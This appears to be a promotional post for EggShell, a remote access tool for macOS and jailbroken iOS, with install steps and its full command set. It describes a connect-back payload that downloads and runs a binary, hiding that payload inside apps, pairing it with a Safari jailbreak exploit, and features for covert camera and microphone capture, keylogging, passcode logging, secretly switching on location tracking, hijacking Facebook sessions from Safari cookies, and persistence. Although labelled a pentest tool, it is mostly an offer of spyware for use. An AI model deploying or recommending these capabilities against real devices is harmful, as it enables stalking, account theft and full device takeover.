EggShell - iOS/macOS Remote Administration Tool

Fi8sVrs · August 22, 2017

Brief Overview

EggShell (formerly NeonEggShell) was a project I started in August of 2015. It is a remote control pentest tool written in python. After trying out Metasploits “Meterpreter”, I decided to create a better, native, secure, and easier tool with most, if not more commands for macOS And Jailbroken iOS Devices. This tool creates a bash payload what spawns a command line session with the target including extra functionality like downloading files, taking pictures, location tracking, and dozens of other commands. EggShell also has the functionality to handle and switch between multiple targets. Communication between server and target is encrypted with AES

Encrypted Communication

All data sent between the server and target are encrypted with 128 bit AES. This means files, pictures, and commands are encrypted end to end. The server and the payload each have a shared key that is used to encrypt the random AES key that is used for communication. The random AES key is generated each time the server script is started.

Getting Started

To use EggShell, you must have pycrypto and Python 2.7.x installed

Install using git: (macOS/Linux)

git clone https://github.com/neoneggplant/EggShell
cd EggShell
python eggshell.py

Create And Run A Payload

Using the menu, we can choose to create a bash payload, this is what will be run on the target machine. It is a 2 stage payload, it will connect to our eggshell server, download a shell script and tell our server what device it is, and then finally connect back one more time to download and execute the binary.

Screen-Shot-2016-10-13-at-12.43.52-PM.pn

Example: running the created payload on our target

Screen-Shot-2016-10-13-at-1.03.59-PM.png

Back on our server, we can see we received a connection and an eggshell session has been started!

Screen-Shot-2016-10-13-at-1.13.06-PM.png

macOS Commands

ls : list contents of directory
cd : change directories
rm : delete file
pwd : get current directory
download : download file
picture : take picture through iSight camera
getpid : get process id
openurl : open url through the default browser
idletime : get the amount of time since the keyboard/cursor were touched
getpaste : get pasteboard contents
mic : record microphone
brightness : adjust screen brightness
exec : execute command
persistence : attempts to connect back every 60 seconds
rmpersistence : removes persistence

iOS Commands

sysinfo : get system information
ls : list contents of directory
cd : change directories
rm : delete file
pwd : get current directory
download : download file
frontcam : take picture through front camera
backcam : take picture through back camera
mic : record microphone
getpid : get process id
vibrate : make device vibrate
alert : make alert show up on device
say : make device speak
locate : get device location
respring : respring device
setvol : set mediaplayer volume
getvol : view mediaplayer volume
isplaying : view mediaplayer info
openurl : open url on device
dial : dial number on device
battery : get battery level
listapps : list bundle identifiers
open : open app
persistence : installs LaunchDaemon – tries to connect every 30 seconds
rmpersistence : uninstalls LaunchDaemon
installpro : installs eggshellpro to device

EggShellPro Commands (Cydia Substrate Extension)

lock : simulate lock button press
wake : wake device from sleeping state
home : simulate home button press
doublehome : simulate home button double press
play : plays music
pause : pause music
next : next track
prev : previous track
getpasscode : log successfull passcode attempts
unlock : unlock with passcode
keylog : log keystrokes
keylogclear : clear keylog data
locationservice: turn on or off location services

EggShell Pro

EggShell Pro is a Cydia substrate library that takes advantage of the the system functions in iOS. With this extension, we can perform home button actions, simulate the lock button, toggle location services, and more. Another feature is being able to log the passcode that the iPhone has used to be unlocked with. When interacting with an iOS Device, simply run “installpro” and the dylib file will upload to the device followed by a respring.

Screen-Shot-2017-02-21-at-3.36.39-PM.png

Navigating/Downloading Files

EggShell has a command line interface like feel to it. Using the unix like commands built into eggshell, we can print working directory (pwd), directory listing (ls), remove files (rm), and change directories (cd). Using these commands we can easily navigate the file system just like the command line. Using the download command we can download any file securely over our encrypted connection. In the example below, we go through a directory and download a pdf file on the target machine.

Screen-Shot-2016-10-18-at-6.49.01-PM.png

Taking Pictures

Taking a photo with the “picture” command on macOS will active the iSight camera and send the image data back to the server. To take a picture on iOS use the “frontcam” or “backcam”

Screen-Shot-2016-10-22-at-8.45.46-PM.png

iOS Location Tracking Even With Location Services Off

EggShellPro lets us send commands to toggle location services on or off. This means even if location services are off, we can turn them on, retrieve the location of the device, and then quickly turn location services off.

Screen-Shot-2016-11-21-at-1.39.20-AM.png

We get location coordinates of the exact spot the device is currently in and also a convenient link to google maps.

Screen-Shot-2016-11-21-at-1.40.52-AM.png

iOS Getting Passcode

EggshellPro hooks into lock screen functions and logs any success the devices passcode in memory. When we run “getpasscode” we are sent back the passcode that was used last to unlock the device.

Screen-Shot-2016-11-21-at-2.13.42-AM.png

macOS Hijacking Safari Facebook Sessions

With the command getfacebook, there is a special function in eggshell that parses through binary cookies from safari. Due to safari binary cookies being unencrypted, we can easily leak the Facebook c_user and xs cookies and use it to login on another browser.

Screen-Shot-2016-11-21-at-2.21.55-AM.png

Screen-Shot-2016-11-21-at-2.29.19-AM.png

macOS Persistence

To achieve persistence, even without being root, the command “persistence” adds the payload to the crontab file. It attempts to re-connect every 60 seconds even after a reboot. To remove persistence, simply enter “rmpersistence” and it should remove itself from crontab.

Recording Audio

Using the “mic record” command, we can asynchronously record audio on both iOS and macOS. This means we can record through the mic while running other commands. When we are finished recording, simply run “mic stop”, this will stop the recording of audio and download the audio data.

Screen-Shot-2016-10-18-at-6.41.21-PM.png

Handling Multiple Sessions

With the built in feature “MultiServer”, we can listen for multiple connections. Below is an example with 2 connections on the same device, however this can be done with multiple devices.

Screen-Shot-2016-10-18-at-6.35.27-PM.png

As we connect to targets, we can use “sessions” to list all the active sessions, “interact” to interact with a session, “close” session numbers, and “back” to go back to the multiserver console

Payloads In Apps

Payloads can easily be added inside of apps. Below is an example of using the “system()” function to call our payload, still in just one line! This method can be used on both macOS and jailbroken iOS

Screen-Shot-2016-10-22-at-9.19.03-PM.png

Immediately after running the app, our payload is run and just as expected, we have a connection

Screen-Shot-2016-10-22-at-9.26.48-PM.png

Safari Exploit + EggShell

Soon after iOS security researcher Luca Todesco released his browser based 9.3.3 jailbreak, I reused some of his code to demonstrate taking over a device from safari. Below is my video demonstration featured on EverythingApplePro